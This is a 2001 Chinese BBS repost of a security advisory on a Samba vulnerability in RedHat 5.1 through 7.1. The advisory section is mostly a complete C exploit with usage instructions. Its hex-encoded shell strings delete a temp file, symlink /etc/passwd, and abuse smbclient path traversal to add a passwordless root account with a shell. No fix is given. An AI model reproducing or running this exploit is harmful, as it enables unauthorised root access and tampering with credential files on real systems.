荔园在线

荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀

[回到开始] [上一篇][下一篇]

发信人: bat (蝙蝠仔), 信区: Linux
标  题: RedHat 中的samba存在安全漏洞(zz)
发信站: 荔园晨风BBS站 (Sun Oct 28 15:04:57 2001), 转信

【 以下文字转载自 bat 的信箱 】
【 原文由 jjks.bbs@melon.gznet.edu.cn 所发表 】
发信人: shanhai (半边海), 信区: Linux
标  题: RedHat 中的samba存在安全漏洞(zz)
发信站: 华南网木棉站 (Sun Oct 28 13:04:54 2001), 转信

发信人: pupil (小学生), 信区: hacker
标  题: RedHat 中的samba存在安全漏洞(zz)
发信站: 交通大学兵马俑BBS站 (2001年10月26日19:46:42 星期五), 站内信件

 RedHat 中的samba存在安全漏洞
()
受影响系统:
----------------------------------------------------------------------------
----

* RedHat 5.1
* RedHat 5.2
* RedHat 6.0
* RedHat 6.1
* RedHat 6.2
* RedHat 7.0
* RedHat 7.1


不受影响的系统:
----------------------------------------------------------------------------
----




漏洞内容:
----------------------------------------------------------------------------
----

Redhat中的samba存在漏洞可以导致ROOT权利的获得。


攻击实例:
----------------------------------------------------------------------------
----

/*
* Samba Server r00t exploit
*
* Scope: Local (this exploit) and posible remote if conditions are given.
* Vuln:
* RedHat 5.1
* RedHat 5.2
* RedHat 6.0
* RedHat 6.1
* RedHat 6.2
* RedHat 7.0
* RedHat 7.1
* I don't know if other versions are vulnerable too.
*
* Run this exploit and then take a look at your passwd file.
* Run: ./samba-exp user
*
* Author: Gabriel Maggiotti
* Email: gmaggiot@ciudad.com.ar
* Webpage: http://qb0x.net
*/



#include <stdio.h>
#include <string.h>


int main(int argc,char *argv[])
{
char inject1[]=
        "\x2f\x62\x69\x6e\x2f\x72\x6d\x20\x2d\x72\x66\x20\x2f"
        "\x74\x6d\x70\x2f\x78\x2e\x6c\x6f\x67";
char inject2[]=
        "\x2f\x62\x69\x6e\x2f\x6c\x6e\x20\x2d\x73\x20\x2f\x65"
        "\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x2f\x74\x6d"
        "\x70\x2f\x78\x2e\x6c\x6f\x67";
char inject3a[100]=
        "\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x6d\x62\x63"
        "\x6c\x69\x65\x6e\x74\x20\x2f\x2f\x6c\x6f\x63\x61\x6c"
        "\x68\x6f\x73\x74\x2f\x22\xa\xa";
char inject3b[]=
        "\x3a\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e"
        "\x2f\x73\x68\x5c\x6e\x22\x20\x2d\x6e\x20\x2e\x2e\x2f"
        "\x2e\x2e\x2f\x2e\x2e\x2f\x74\x6d\x70\x2f\x78\x20\x2d"
        "\x4e\xa";


if(argc!=2){
        fprintf(stderr,"usage: %s <user>\n",*argv);
        return 1;
        }
strcat(inject3a,argv[1]);
strcat(inject3a,inject3b);
system(inject1, 0);
system(inject2, 0);
system(inject3a, 0);
return 0;
}


解决方案:
----------------------------------------------------------------------------
----

尚无

gabriel maggiotti (gmaggiot@ciudad.com.ar)






关  闭
----------------------------------------------------------------------------
----

北京华泰网安信息技术有限公司 版权所有
Copyright (C) 2001 www.netguard.com.cn. All Rights Reserved


--
       梦里不知身是客




--
:人生在世  难得糊涂

※ 来源:.华南网木棉站 bbs.gznet.edu.cn.[FROM: bbs.xanet.edu.cn]
--
※ 转寄:.华南网木棉站 bbs.gznet.edu.cn.[FROM: 深大荔园晨风转站]
--
※ 转载:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.0.175]

[回到开始] [上一篇][下一篇]

荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店